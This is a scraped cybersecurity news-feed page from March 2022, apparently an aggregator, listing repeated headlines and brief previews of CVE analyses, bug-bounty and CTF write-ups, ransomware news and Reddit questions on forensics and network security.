    找回密码时使用位数较少的短信验证码,或者验证码没有设置有效时间限制,导致攻击者借助自动化工具在一定时间范围内爆破获得短信验证码,从而导致重置任意账号密码。
    当心,安卓银行木马Escobar 正伺机而动
    Escobar作为Aberebot恶意软件的新版本,迭代了新功能,包括窃取 Google Authenticator 多因素身份验证代码。
    育碧遭遇网络攻击,造成服务暂时中断
    有关育碧遭到网络攻击的谣言在网上流传,而数据勒索组织LAPSUS$则表明这并不是留言,他们已经入侵了育碧。
    全国信安标委公布《2022年网络安全国家标准需求清单》
    清单共包含34项标准,其中制定标准20项,修订标准14项。
    盘点:12种基于风险的身份验证工具
    基于风险的身份验证(RBA)也称为自适应身份验证,是一种在不强制用户使用两因素身份验证(2FA)的情况下提高网站账户安全性的方法。
    FreeBuf早报 | 谷歌向乌克兰安卓用户推出空袭报警系统;育碧证实遭网络攻击
    谷歌官方博客宣布向乌克兰安卓用户推送空袭警报系统。谷歌称,有数百万人依赖于空袭警报系统,它通过Play Services推送。
  • Open

    SecWiki News 2022-03-14 Review
    [HTB] Ophiuchi Writeup by 0x584a Watchdog 还是 TeamTNT?一例攻击归因刍议 by Avenger SecWiki周刊(第419期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-14 Review
    [HTB] Ophiuchi Writeup by 0x584a Watchdog 还是 TeamTNT?一例攻击归因刍议 by Avenger SecWiki周刊(第419期) by ourren 更多最新文章,请访问SecWiki
  • Open

    From Recon via Censys and DNSdumpster, to Getting P1 by Login Using Weak Password — “password”
    No content preview
    Insecure comparison in PHP — Business Logic Bypass vulnerability
    No content preview
    How Did I Leak 5.2k Customer Data From a Large Company? (via Broken Access Control)
    No content preview
    SQLi: Next Level
    No content preview
    Shocker From Hackthebox
    No content preview
    Setup Armitage as a Command & Control (C2) Framework for Free
    No content preview
    UTCTF 2022 — Writeup
    No content preview
    Return-Oriented Programming on RISC-V — Part 1
    No content preview
  • Open

    From Recon via Censys and DNSdumpster, to Getting P1 by Login Using Weak Password — “password”
    No content preview
    Insecure comparison in PHP — Business Logic Bypass vulnerability
    No content preview
    How Did I Leak 5.2k Customer Data From a Large Company? (via Broken Access Control)
    No content preview
    SQLi: Next Level
    No content preview
    Shocker From Hackthebox
    No content preview
    Setup Armitage as a Command & Control (C2) Framework for Free
    No content preview
    UTCTF 2022 — Writeup
    No content preview
    Return-Oriented Programming on RISC-V — Part 1
    No content preview
  • Open

    From Recon via Censys and DNSdumpster, to Getting P1 by Login Using Weak Password — “password”
    No content preview
    Insecure comparison in PHP — Business Logic Bypass vulnerability
    No content preview
    How Did I Leak 5.2k Customer Data From a Large Company? (via Broken Access Control)
    No content preview
    SQLi: Next Level
    No content preview
    Shocker From Hackthebox
    No content preview
    Setup Armitage as a Command & Control (C2) Framework for Free
    No content preview
    UTCTF 2022 — Writeup
    No content preview
    Return-Oriented Programming on RISC-V — Part 1
    No content preview
  • Open

    攻防 tricks — 通过兼容性差异突破安全防护
    作者:Glassy 原文链接:https://g1asssy.com/2022/03/11/fuzz/ 引言 安全防护产品在进行防护的时候是需要对流量中的数据进行处理的,同样,被攻击的应用也需要处理这些数据以保证业务的正常进行,然而在很多情况下,安全产品处理数据流的框架和应用处理数据流的框架往往不同,在针对常规数据方面,当然不会出现问题,然而一旦被防护应用的数据处理框架的兼容性大于安全产品数...
    攻防 tricks — 通过兼容性差异突破安全防护
    作者:Glassy 原文链接:https://g1asssy.com/2022/03/11/fuzz/ 引言 安全防护产品在进行防护的时候是需要对流量中的数据进行处理的,同样,被攻击的应用也需要处理这些数据以保证业务的正常进行,然而在很多情况下,安全产品处理数据流的框架和应用处理数据流的框架往往不同,在针对常规数据方面,当然不会出现问题,然而一旦被防护应用的数据处理框架的兼容性大于安全产品数...
    The idols NFT marketplace 重入漏洞分析
    作者:Dig2 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 背景介绍 The idols是以太坊上的NFT项目,其特点在于会按照用户持有idols NFT的数量,分红Lido质押奖励(资金来源为项目公售获得的约2250 ETH)。该项目同时发行$VIRTUE代币,购买并质押代币的用户会分红idols NFT的交易...
    The idols NFT marketplace 重入漏洞分析
    作者:Dig2 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 背景介绍 The idols是以太坊上的NFT项目,其特点在于会按照用户持有idols NFT的数量,分红Lido质押奖励(资金来源为项目公售获得的约2250 ETH)。该项目同时发行$VIRTUE代币,购买并质押代币的用户会分红idols NFT的交易...
  • Open

    攻防 tricks — 通过兼容性差异突破安全防护
    作者:Glassy 原文链接:https://g1asssy.com/2022/03/11/fuzz/ 引言 安全防护产品在进行防护的时候是需要对流量中的数据进行处理的,同样,被攻击的应用也需要处理这些数据以保证业务的正常进行,然而在很多情况下,安全产品处理数据流的框架和应用处理数据流的框架往往不同,在针对常规数据方面,当然不会出现问题,然而一旦被防护应用的数据处理框架的兼容性大于安全产品数...
    攻防 tricks — 通过兼容性差异突破安全防护
    作者:Glassy 原文链接:https://g1asssy.com/2022/03/11/fuzz/ 引言 安全防护产品在进行防护的时候是需要对流量中的数据进行处理的,同样,被攻击的应用也需要处理这些数据以保证业务的正常进行,然而在很多情况下,安全产品处理数据流的框架和应用处理数据流的框架往往不同,在针对常规数据方面,当然不会出现问题,然而一旦被防护应用的数据处理框架的兼容性大于安全产品数...
    The idols NFT marketplace 重入漏洞分析
    作者:Dig2 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 背景介绍 The idols是以太坊上的NFT项目,其特点在于会按照用户持有idols NFT的数量,分红Lido质押奖励(资金来源为项目公售获得的约2250 ETH)。该项目同时发行$VIRTUE代币,购买并质押代币的用户会分红idols NFT的交易...
    The idols NFT marketplace 重入漏洞分析
    作者:Dig2 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 背景介绍 The idols是以太坊上的NFT项目,其特点在于会按照用户持有idols NFT的数量,分红Lido质押奖励(资金来源为项目公售获得的约2250 ETH)。该项目同时发行$VIRTUE代币,购买并质押代币的用户会分红idols NFT的交易...
  • Open

    How to Fact Check News
    Now, more than ever we are bombarded with news on and offline. Friends share stories or post them on their walls, but how do you tell what… Continue reading on Medium »
    Solution to some CTF challenges from https://investigator.cybersoc.wales
    A few months ago I participated in the CTF of https://investigator.cybersoc.wales/. Continue reading on Medium »
  • Open

    Is there a way to see how someones API is formatted?
    I have the source files of the react app, it uses the next.js framework. The .env file has process.env.NEXT_PUBLIC_API and process.env.NEXT_PUBLIC_API_TOKEN I was able to get both values by using the inspect tool on the live page. They are NEXT_PUBLIC_API=https://api.example.com NEXT_PUBLIC_API_TOKEN=thetokenstring The next.config.js file reads module.exports = { webpack: (config, { isServer }) => { // Fixes npm packages that depend on `fs` module if (!isServer) { config.node = { fs: 'empty' } } return config } } I am trying to re-create the api so I can use my own in my app. When I use the inspect tool again on the live app and click the network tab, I can see the data the api is pulling it. It seems to be just in simple json formatting. When I enter the site through builtwith.com I can see some of it is hosted on AWS EC2 in addition to vercel. In the a .js file - the API is pulled in like: _getPairs = async () => { try { const response = await fetch(`${process.env.NEXT_PUBLIC_API}/api/v1/pairs`, { method: 'get', headers: { 'Authorization': `Basic ${process.env.NEXT_PUBLIC_API_TOKEN}`, } }) const pairsCall = await response.json() return pairsCall.data } catch(ex) { console.log(ex) return [] } } and updatePairsCall = async ( account) => { try { const response = await fetch(`${process.env.NEXT_PUBLIC_API}/api/v1/updatePairs`, { method: 'get', headers: { 'Authorization': `Basic ${process.env.NEXT_PUBLIC_API_TOKEN}`, } }) const pairsCall = await response.json() this.setStore({ pairs: pairsCall.data }) await this._getPairInfo( account, pairsCall.data) } catch(ex) { console.log(ex) } } ​ Is there an easy way to re-create this API? Im a totally off base? Thank you submitted by /u/tokentrader [link] [comments]
  • Open

    Mac photo library
    Can it be determined what device was responsible for uploading image to cloud in photos.sqlite database — what info is available? submitted by /u/Complete-Cockroach80 [link] [comments]

  • Open

    Solution to my $20 egg hunt (Part 1)
    Last week, I posted an article titled “There’s $20 hidden in this post”. Here’s how to solve the first part of it… Continue reading on Medium »
    The story of 3 bugs that lead to Unauthorized RCE — Pascom Systems
    A detailed post on how I chained 3 vulnerabilities (A path traversal, An SSRF in an external piece of software, and a post-authentication… Continue reading on Medium »
    Open Redirect via Sendgrid Email Misconfiguration
    Hello developer , bug hunter and cyber security enthusiast. In this opportunity i wanna show you my first Bug Bounty writeup from one of a… Continue reading on System Weakness »
    Cybersecurity Bible: The 5 rules for every beginner.
    I have come a long way in cybersecurity. Here’s why I'm eligible for writing this, I have faced every problem, had sleepless nights, and… Continue reading on Medium »
  • Open

    Reverse Engineering a Netgear NDay
    submitted by /u/lightgrains [link] [comments]
    An automated setup for fuzzing Apache httpd w/ AFL++
    submitted by /u/pwntheplanet [link] [comments]
    An automated setup for fuzzing Redis w/ AFL++
    submitted by /u/pwntheplanet [link] [comments]
  • Open

    Have I been Hacked or not????
    Have you ever thought you have been hacked? Or do you think your data’s secure in the digital world? We’re using many apps in our day to… Continue reading on Medium »
    Good News Roundup: the OSINT-inspired Geek Edition
    In this week’s good news, OSINT mobilizes for Ukraine, movement ecology achievements in AI, plus #Rstats tips for GIS and genomics Continue reading on Medium »
    SPY NEWS: 2022 — Week 10
    Summary of the espionage-related news stories for the Week 10 (7–12 March) of 2022. Continue reading on Medium »
  • Open

    Questions about getting into DF
    Hi everybody. I'm sorry if this post goes against any rules or has been answered in depth somewhere else. I'm a 2nd year computer science major wondering about getting into DF, especially the LE side of things. Does anyone resources or information about the general path to get a job in DF? Are there certain ternships or work experience you can get while earning a degree that will help more than others? Are there specific certifications I should be looking to get in the future? Should I be pursuing a degree in DF, or would a degree in CS be a good base to work with? I don't think I have many classes that would transfer over besides some math/stats classes and a class on computer systems. I'm really just interested in seeing what the fastest path I can take from here to a job is, if I do end up pursuing DF. I really don't have any knowledge on DF or cybersecurity, but I made a tryhackme account and I'll test the waters with some of the modules on there to see if I wanna really dive into this field. I've heard about SANS courses, seen some good online DF degrees from Champlain and other colleges, but I'm just not sure where to go from here. Thank you to anyone who takes the time to answer any of these questions! submitted by /u/Normijah625 [link] [comments]
  • Open

    小白谈数据安全1
    安全小白对数据安全的泛泛谈
    《2021网络空间测绘年报》解读|公有云资产画像与风险度量
    近日,绿盟科技与中国电信联合发布《2021网络空间测绘年报》,旨在通过测绘的方法,发现物联网、公有云、工控系统、安全设备、数据库、智慧平台等关键领域资产在公网上的暴露情况
    《2021 DDoS攻击态势报告》解读 | 基于威胁情报的DDoS攻击防护
    随着5G、云计算、大数据、物联网等新兴数字产业的发展,信息基础设施的建设规模也随之扩大,这无疑会导致越来越多的网络资产暴露在互联网上。这些资产一旦被DDoS攻击者所利用,将会对网络安全带来严重威
    如何使用Katoolin3将Kali中的所有程序轻松移植到Debian和Ubuntu
    帮助广大研究人员将Kali Linux中的各种工具轻松移植到Debian和Ubuntu等Linux操作系统中。
    俄罗斯将禁止 Instagram
    俄罗斯互联网监督机构 Roskomnadzor 将在俄罗斯禁止 Instagram。
    iptables&Netfilter简介
    iptables&Netfilter简介
    SyntheticSun – 深度防御安全自动化和监控框架,利用威胁情报、机器学习、托管 AWS 安全服务和无服务器技术持续预防、检测和响应威胁
    SyntheticSun 是一个深度防御安全自动化和监控框架,它利用威胁情报、机器学习、托管 AWS 安全服务和无服务器技术来持续预防、检测和响应威胁。
  • Open

    SecWiki News 2022-03-13 Review
    Linux系统安全强化指南 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-13 Review
    Linux系统安全强化指南 by ourren 更多最新文章,请访问SecWiki
  • Open

    Oracle Access Manager Pre-Auth RCE (CVE-2021–35587 Analysis)
    Article URL: https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316 Comments URL: https://news.ycombinator.com/item?id=30661899 Points: 1 # Comments: 0
  • Open

    Fuzzing with AFL – Part 2: Trying Smarter(Apache)
    Article URL: https://0xbigshaq.github.io/2022/03/12/fuzzing-smarter-part2 Comments URL: https://news.ycombinator.com/item?id=30661893 Points: 1 # Comments: 0
  • Open

    scancss - Fastest tool to find XSS.
    Cross site scripting (XSS) vulnerability is very easy, popular and available on many websites. Continue reading on Medium »
  • Open

    How secure is creditcard info on company servers nowadays?
    I'm reluctant to use credit cards when I can because I've seen a lot of stories of hacks into places like hotel servers where they get access to card details , customer name & address, etc But most of these are from a few years ago, has there been can upgrade that miniminzsd the risk of this happening nowadays? As in is this info stored in a more secure way now? submitted by /u/computerstuffs [link] [comments]
    Fuzz testing in the SDLC
    My company’s security org is curious about adding fuzz testing to our secure SDLC pipeline. I’ve been reading about the topic, which I’m finding fascinating, but it’s also left me with some questions about when to fuzz and which flavour of fuzzing would make sense for the large number of services/APIs in our portfolio. -At which phase does fuzzing get in the picture? Is this something typically run later as in QA and deployment/release or post-commit/build similar to SAST? Would the latter scenario be redundant given we run SAST? -How agile is black box and grey box (instrumentation guided) fuzzing for an app portfolio with a rapidly changing attack surface? I’m leaning towards black-box mutation and template fuzzers since the attack surface can be supplied via a network traffic capture, API specification…all of which are easily retrievable from other tools in our QAT/AST framework. My understanding is grey box fuzzers require user programmed harness classes to interface with the app. Meaning every time a new entry point is added or removed or a new app is onboarded, the fuzzer needs an updated setup. Afaik this setup is done manually at least for all the open-source grey box fuzzers I’ve looked into. Any gotchas or recommendations on fuzz testing adoption strategy are much appreciated. submitted by /u/phuckphuckety [link] [comments]
    Any thoughts on this course called HEXORCIST?
    Looking for if anyone has any thoughts or opinions on this course for reverse engineering or if they themselves have signed up for this course? The course is found here https://www.reverse-engineer.net/ submitted by /u/SufficientDistrict10 [link] [comments]
    Organizing vulnerability research?
    Hi all! I've been doing bits and pieces of vulnerability research on my own time, and typically I do it only so far as I feel "engaged" with the project. As you might imagine, this leads to dropping projects often and swapping between them, which looks horrible for career potential but also leads me to be constantly burnt out of research and other hobby projects. I am revisiting a very niche router OS with intention to reverse engineer the firmware, such that I can understand its attack surface (and find bugs, eventually). This is a massive undertaking for me, but one that I believe is a good move as doing so would demonstrate my ability to adapt and learn new things; the biggest problem though, is me and my lack of organization. Thus, I'm wondering what tactics, techniques and procedures you all use when going about research. I'm no stranger to kanban boards and the like, and appreciate the idea of planning things out in weekly chunks, but is this advisable? submitted by /u/Mostly_Breadfruit [link] [comments]
  • Open

    Implementing Syscalls in Cobalt Strike Part 1 - Battling Imports and Dependencies
    submitted by /u/dmchell [link] [comments]
  • Open

    Korean and English Folder names, Movie names. stuff all over the place. (nsfw just in case)
    submitted by /u/thats_dumberst [link] [comments]

  • Open

    KB4288: CVE-2022-26500 | CVE-2022-26501
    submitted by /u/ghost-train [link] [comments]
    Casper-fs is a Custom Hidden Linux Kernel Module generator. Each module works in the file system to protect and hide secret files.
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    Can anyone recommend a free remediation tracking software?
    App, web app, i dont care. i just need to keep track of things and organize them. Thanks submitted by /u/networkalchemy [link] [comments]
    Tool for network visualization
    Is there any free script or tool to visualize network knots like here? https://miro.medium.com/max/600/1*D3DB7o6maH5BAxm5vWL4XA.png submitted by /u/dashlf92 [link] [comments]
    Open source Web application security scan tool
    Is there any good Open Source Web Application Security Scan Tool you can recommend? We've developed a few web applications and look to build better protections. thanks, submitted by /u/alphasystem [link] [comments]
    State of the Subreddit #4
    Hello r/AskNetsec! It's been a while since we've last done one of these, and we hope that you all have been well. We the moderators, wish you all well, and that everyone stays safe during these interesting times. ​ Flair system! -As you might have noticed, flairs have appeared. In order to organize the sub in a friendly manner, we have implemented a required flair system. The flairs: Analysis – Requesting aid to determine security/network-related issues. WITH DATA/Background Architecture – Questions related to best practices for environmentally based things. Product etc. Concepts – Questions around security concepts (IE Least Privileged, User Awareness, CIA Triad, Walled Garden, etc.) Threats – Questions related to specific threats in the security landscape. Compliance – Questions around compliance and legal standards (GDPR, NIST, PCI-DSS, etc.) Education – Further education questions, what certificates, degrees to go for, getting started in the field, etc. Work – Related to work questions. Burnout, salary, HR, etc. Other – Not fitting other categories. This is, of course, still a work in progress. Please feel free to comment on any suggestions you might have. ​ I would like to iterate that asking for help in committing a crime of any sort is not allowed. This is an immediate permanent ban. ​ The sub has been growing well in the past few months, and we couldn't be more grateful for the support that has been given. We will see you all again in 3 months for the next State of the Subreddit. ​ - AskNetSec Moderators submitted by /u/-Vampires- [link] [comments]
  • Open

    What model of ThinkPad should I buy for malware analysis?
    I am going to be starting community college as a cybersecurity major, and I am really interested in malware analysis. I heard that the ThinkPad is a pretty good laptop for that sort of thing, so I am looking into buying one pretty soon. I'm currently doing an internship and my boss told me that I should get a laptop that runs Hyper-V and VM. He also told me that the P15 series is pretty good for malware, but I am not sure yet. What model of the ThinkPad should I get for this what specs do you suggest that I look for? submitted by /u/MadScientist876 [link] [comments]
    Asking for help in what’s steps need to be taken to data recovery on a wiped iPhone 6s 128g
    I recently received an iPhone 6s 128gb in for data recovery I’m using this as an opportunity for learning as I’ve never done recovery on an iPhone so I came here to ask what step should I take and what should be done for the best chance of data of recovery Please and thank you submitted by /u/23Weirdo23 [link] [comments]
    Prima facie
    Typically how is prima facie established in digital forensics? Again, is user attribution important for prima facie or is a somebody owning an equipment/control of an account sufficient? submitted by /u/Complete-Cockroach80 [link] [comments]
  • Open

    Geolocating Images — Tryhackme
    Görüntüleri Coğrafi Konum Belirleme Continue reading on Medium »
  • Open

    Domain Escalation: Resource Based Constrained Delegation
    Introduction Delegation has been a part of Microsoft’s Active Directory environment since the early 2000s and has remained one of few ignored threats by system The post Domain Escalation: Resource Based Constrained Delegation appeared first on Hacking Articles.
  • Open

    Domain Escalation: Resource Based Constrained Delegation
    Introduction Delegation has been a part of Microsoft’s Active Directory environment since the early 2000s and has remained one of few ignored threats by system The post Domain Escalation: Resource Based Constrained Delegation appeared first on Hacking Articles.
  • Open

    A bug that made me $250
    Hey guys! I’m back with another write-up and this one’s about a bug for which I got awarded $250, so let’s start. Continue reading on Medium »
    Tactical Fuzzing — XSS
    XSS Continue reading on Medium »
    A Tale of Open Redirection to Stored XSS
    Hello guys, Continue reading on Medium »
    I have Found Microsoft Subdomain Website database list, database username, password
    Hello, Hackers 👋👋 Continue reading on Medium »
    XSS through base64 encoded JSON
    This is one of my very interesting and unexpected finding while testing an Application Tracking System. Continue reading on Medium »
  • Open

    The Discovery and Exploitation of CVE-2022-25636
    Article URL: https://nickgregory.me/linux/security/2022/03/12/cve-2022-25636/ Comments URL: https://news.ycombinator.com/item?id=30653137 Points: 92 # Comments: 3
  • Open

    SecWiki News 2022-03-12 Review
    安全中间件的设计思路和简单实践 by ourren 威胁情报平台OpenCTI的搭建 by ourren 人工智能(AI)&网络安全 by ourren 安全和美-我对网络安全的观察和思考 by ourren 开源组件治理的实践与思考 by ourren AKG:攻击者知识图谱 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-12 Review
    安全中间件的设计思路和简单实践 by ourren 威胁情报平台OpenCTI的搭建 by ourren 人工智能(AI)&网络安全 by ourren 安全和美-我对网络安全的观察和思考 by ourren 开源组件治理的实践与思考 by ourren AKG:攻击者知识图谱 by ourren 更多最新文章,请访问SecWiki
  • Open

    Census Vulnerability Exposes 10k OAuth Tokens, Thousands of User Records
    Article URL: https://robertwillishacking.com/census-vulnerability-exposes-10k-oauth-tokens-thousands-of-user-records/ Comments URL: https://news.ycombinator.com/item?id=30652143 Points: 3 # Comments: 0
  • Open

    Casper-fs LKM
    Casper-fs is a Custom Hidden Linux Kernel Module generator. Each module works in the file system to protect and hide secret files This program has two principal functions: turning private files hidden. The second function is to protect confidential files to prevent reading, writing and removal. https://github.com/CoolerVoid/casper-fs submitted by /u/CoolerVoid [link] [comments]

  • Open

    Insecure comparison in PHP — Business Logic Bypass vulnerability
    I have recently spotted an interesting vulnerability in a PHP application, which was in scope of a private bug bounty program. This… Continue reading on InfoSec Write-ups »
    How Did I Leak 5.2k Customer Data From a Large Company? (via Broken Access Control)
    Hello everyone! Continue reading on Medium »
    Rate Limit Bypass at Readme.com
    Hey Community !! Continue reading on Medium »
    How i chained open-redirect to SSRF(Server Side Request Forgery)?
    So you are here, i have seen people reporting open-redirect without exploiting it for SSRF and being happy with low impact. You should… Continue reading on Medium »
    How I was able to takeover any users account on a major telecoms website
    Hello, todays write up is about multiple instances of the same vulnerability I found on a major African telecoms providers website, we… Continue reading on Medium »
    FREE LABS TO TEST YOUR PENTEST/CTF SKILLS
    · Academy Hackaflag BR - https://hackaflag.com.br/ · Attack-Defense - https://attackdefense.com · Alert to win - https://alf.nu/alert1 ·… Continue reading on Medium »
    A bug bounty mistake…
    Sometimes if it looks like XSS, it may not actually be XSS. Continue reading on Medium »
  • Open

    New Content!
    Hello! If you happen to find this page, all content has been moved and will be published to my new site going forward. Continue reading on Medium »
    TryHackMe | Red Team Fundamentals WriteUp
    This room is an introduction to red teaming Continue reading on Medium »
    TryHackMe writeup: Steel Mountain
    Steel Mountain is a TryHackMe room that sports a Mr. Robot theme. It is great for those into hacking shows an new to the scene! Continue reading on InfoSec Write-ups »
  • Open

    As an IT veteran, getting into Cybersecurity. What are my best next steps to move toward an IT/Cybersecurity Forensics career?
    Hello everyone. I will achieve my Security+ degree this year (mere months away). Currently, I have lots of IT experience, over 20 years of IT analyst, Helpdesk, and IT Desktop support, but I'm new to IT Security beyond what those roles entail. My question is: What should my next step(s) be to getting a solid Cybersecurity Forensics career underway? I love remote (WFH) work and hope to one day have more of that, and less office time needed, but starting out, I'll do what I have to do. Do I need to study for a more advanced cert right away after getting the Security+? I know I need to work in a more entry-level IT Security-based job FIRST, get my feet wet obviously, prove I can do the basics, but beyond that, what should I be focusing on to move in the IT forensics direction? I really do appreciate any help, tips, play by plays, or just guidance for this general. submitted by /u/cleverestx [link] [comments]
    Google search warrant return question
    As you can tell by reading, I'm new to this. Thanks for any insights: Is it normal that some of the elements of a Google search warrant are formatted in HTML as a bunch of boxes containing information? I'm surprised that it wouldn't just be all in CSV or some other easy to parse/sort format. Under MyActivity, there's a document that lists browser/search activity (in boxes) that say "Visited Google Search" but none of these appear to contain any detail about what was searched. Am I not able to see what was actually searched? Is that something the user elected to keep private or is that standard reporting behavior of a Google return? Is folder-by-folder, file-by-file examination of these various HTML and CSV files the way most people approach looking through these things? Is there an obvious, better way? submitted by /u/PieWithIceCreamCrust [link] [comments]
  • Open

    SATCOM terminals under attack in Europe: a plausible analysis.
    submitted by /u/eberkut [link] [comments]
    An unexpected Redis sandbox escape affecting only Debian, Ubuntu, and other Debian derivatives
    submitted by /u/albinowax [link] [comments]
  • Open

    LockBit 2.0 ransomware bugs and database recovery attempts
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    CVE-2022-24696 – Glance by Mirametrix Privilege Escalation
    When investigating my laptop, I stumbled upon something interesting that resulted in privilege escalation. I use a Lenovo ThinkPad X1 Extreme Gen 1, which has an installed software named Glance, for my day-to-day work. The purpose of this software is to use the advanced web camera to figure out if you are speaking when the... The post CVE-2022-24696 – Glance by Mirametrix Privilege Escalation appeared first on TrustedSec.
  • Open

    What's the best free security scan tool for C/C++ files?
    My team needs to run a security analysis on an entire Github repo that includes mostly C/C++ files (a couple of non-C/C++ files are there too). What's the best free security scan tool that can be used to scan a repo in a Linux environment and scan all C/C++ files in the directories/subdirectories of the repo for bugs, vulnerabilities, code smells, etc.? submitted by /u/techsavvynerd91 [link] [comments]
    Are the type of "Flood" attacks really important?
    Hey folks, I'm learning about DDoS attacks, and I see a lot of ICMP floods, UDP floods, HTTP floods, etc. At the end of the day, the attacker sends Ethernet frames to the victim server and its network, so if we look only at how it affects the bandwidth of server or network devices, there isn't any. In my point of view, it's can only help to pass some obstacles. For example, the Firewall blocks ICMP requests, but not HTTP because it legitimate requests from a web server like Amazon. Maybe the difference can be significant if we talk about exhausting CPU and RAM because probably HTTP GET or POST can require the server to do a lot more than ICMP protocol. I get it right or totally messed up something? Thanks. submitted by /u/Webly99 [link] [comments]
    Car transmission hack
    I'm a target of hackers right now. They have hacked my car alarm to beep nonstop. Now for the first time yesterday my car was hacked to go from D to Neutral while driving. Any thoughts on how they did it? Don't tell me to get maintenance on my car, I'm a former mechanic and it's not a transmission problem... submitted by /u/Dogfish18 [link] [comments]
    Accessing home server from outside home - Possible methods without publicly opening access?
    Hello! I have a very basic homeserver connected to a router via LAN. I use it for Plex and nextcloud. I am pretty technologically adept, but I am not close to being adept at networking or security. I do take my privacy some what seriously and I'm assuming that simply portforwarding my Plex and Nextcloud instances to be able to access them outside of my house is dangerous. But I'm also in a position where I'm not informed enough to do something different. I can easily follow guides to do stuff and can troubleshoot. The homeserver runs Ubuntu. Are my doubts about portforwarding unfounded? If not, what other alternatives can I use to remotely access my homeserver and how would I go about installing them? I'm sorry if this is a very stupid question, as I said before, I'm not adept when it comes to networking and security.. Thanks in advance! submitted by /u/sadhgurukilledmywife [link] [comments]
    Tencent's VooV Meeting - Thoughts?
    It looks like my team is being cornered into installing VooV Meeting for some management meetings for various reasons. I've suggested using the web-based version, which hasn't seemed to work in their test meetings. I'm looking for some opinions on the use of this meeting software. I'm already planning to install it for the requested meeting, then immediately uninstall it afterwards. Considering further measures. Am I being paranoid? submitted by /u/unseenspecter [link] [comments]
  • Open

    CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability - https://esccvc.de.ibm.com
    IBM disclosed a bug submitted by 0xelkomy: https://hackerone.com/reports/938684
    Public Jenkins instance with /script enabled
    IBM disclosed a bug submitted by thesanjok: https://hackerone.com/reports/1492447
  • Open

    Yamagata XSS journey
    Hi readers! This write-up is about my yamagata XSS labs journey. There is a total of 19 stages in this lab. We have to execute the… Continue reading on Medium »
  • Open

    ‘We are not ready’: a cyber expert on US vulnerability to a Russian attack
    Article URL: https://www.theguardian.com/technology/2022/mar/10/us-russia-cyber-attack-prepared Comments URL: https://news.ycombinator.com/item?id=30642010 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-03-11 Review
    网络安全2022:守望高质量-PDF by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-11 Review
    网络安全2022:守望高质量-PDF by ourren 更多最新文章,请访问SecWiki
  • Open

    [ Hack The Box ] Kryptic Ransomware - Writeup
    Europol EC3 is looking for clues that will lead to the arrest and prosecution of the Enigma Team leader. Continue reading on Medium »
    Managing your licenses in Lampyre
    If you have been following us on Medium for a while, you might have read our ‘OSINT 101 with Lampyre’ article, which is basically a good… Continue reading on Medium »
    OhSint Machine
    This is a walkthrough for the Osint Machine from TryHackMe . They just give us an image. Let’s open the image, we get the image of… Continue reading on Medium »
    How to find someone on OnlyFans?
    How to find someone on OnlyFans? We’ve been chatting to some experts in online investigations, what we found out was pretty useful. Continue reading on Medium »
    How to Find Someone on POF?
    Are you trying to find someone, that perhaps shouldn’t be on Plenty of Fish (POF)? Continue reading on Medium »
  • Open

    Introducing the mystery lab challenge
    For anyone who's used the Web Security Academy before, you'll be pretty familiar with the format. For those of you who haven't had the pleasure, the process goes a little bit like this: Select a set o
  • Open

    Introducing the mystery lab challenge
    For anyone who's used the Web Security Academy before, you'll be pretty familiar with the format. For those of you who haven't had the pleasure, the process goes a little bit like this: Select a set o
  • Open

    System Hardening을 피해 RCE를 탐지하기 위한 OOB 방법들
    여러분들은 RCE(Remote Code Execution)를 식별하기 위해 어떤 방법을 사용하고 있나요? 저는 개인적으로 OOB(Out-of-band)를 즐겨서 사용합니다. Sleep 등 time 기반도 정확 하지만, 비동기 로직이 많은 요즘 time 보단 oob가 더 정확하다고 생각이 드네요. (물론 둘 다 체크하지만요 😊) 물론 서비스의 인프라에 따라서 외부로의 Outbound 요청이 제한되는 곳이 많을겁니다. 다만 보통 일반적인 트래픽에 대한 제한이 있지, DNS Query 까지 막는 경우는 많지 않습니다. (내부 DNS를 타고 공격자의 도메인을 쿼리하면 결국 공격자는 OOB로 웹 요청을 시도했다는 것을 알 있죠)
  • Open

    约翰·卡马克:怎么会有人不喜欢电子游戏呢?
    游戏之神
    用安全守护金融,CIS 2021春日版金融科技分论坛回顾
    3月9日下午,「CIS 2021网络安全创新大会Spring·春日版」金融科技安全专场成功进行线上直播。
    全国政协委员肖新光:三份提案聚焦推进网络安全想定推演、 IT供应链网络安全能力和软件安全工程的建设
    3月10日,中国人民政治协商会议第十三届全国委员会第五次会议在北京闭幕。本届两会,全国政协委员、安天集团创始人肖新光提交三份提案,聚焦推进网络安
    FreeBuf周报 | 三星被公开了源代码和190GB机密数据;Firefox再爆两个0Day漏洞
    继NVIDIA核心源代码75GB的机密数据和核心源代码被泄露后,勒索组织公开了韩国三星电子150GB的机密数据和核心源代码。
    僵尸网络Emotet卷土重来,已感染179个国家的13万台设备
    Emotet自去年11月复出以来发展迅猛,且具备了以往所没有的新功能。
    密码学的安全性浅析2
    分组密码是一种对称密钥算法。它将明文分成多个等长的模块,使用确定的算法和对称密钥对每组分别加密解密。分组加密是极其重要的加密协议组成,其中典型的如AES和3DES作为美国政府核定的标准加密算法。
    挑战亚马逊微软云市场“一哥”地位,谷歌拟54亿美元收购网安公司Mandiant
    如收购成功,Mandiant将加入谷歌的云计算部门,以更好地和亚马逊AWS和微软Azure在云市场开展竞争。
    为对抗制裁,俄罗斯决定自建TLS根证书
    目前,俄罗斯政府已经决定自己创建一个证书颁发机构,提供独立颁发和更新 TLS 证书的解决方案。
    观仔讲堂 | APT钓鱼邮件分析
    近期有同事反映疑似收到了钓鱼邮件。发件人也是公司同事的名字,但发件邮箱 comercial1@qualitypro.com.co不是公司的邮箱
    CIS2021 春日版安全合规专场线上直播回顾,网安大咖建言献策共谋实践与发展
